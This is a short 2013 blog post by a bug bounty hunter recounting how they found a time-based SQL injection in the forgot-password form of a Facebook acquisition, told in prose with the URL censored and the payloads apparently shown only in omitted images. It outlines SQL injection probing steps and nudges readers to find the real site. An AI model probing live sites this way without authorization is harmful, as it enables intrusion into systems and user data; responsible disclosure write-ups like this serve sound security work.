Wednesday, June 19, 2013

Facebook Bug Bounty - Time Based SQLi in FB's Acquisition

I'm back.
Previous post I talked about how long the FB's Security team will reply you for your 1st reward (in my case almost a month)

Here's the POC for my finding.
Owh btw, I'll censored the URL. Why? I'm quite sure there's still more bugs in this acquisition. So, for a real bug hunter, with these images, they'll know how to find the real site :D Goodluck!

Time Based SQLi in FB's Acquisition

I checked out on their forgot password form. By testing with single quote (') there's a weird but well-known error appear.yes,SQL error.

Hmm..lets try to close the quote.


Now lets try to give some POC. Use a simple testing with 1 or 1=1 thingy.

hmm unknown error? so this is TRUE/FALSE response.

hah! different error.this might be its FALSE/TRUE response then.

I'm on the right track! but its still not enough for a POC!

Try to figure out a valid column? Lets try the same thing I used for my bounty in Paypal's bounty.

Testing to check if xxxxx is a valid column..NO!

Testing if user is a valid column. YEAH!!!

Final touch-up..lets try with Time-Based testing!

Finally..My bug accepted by Facebook and will join the FB's whitepage. Mission accomplished and..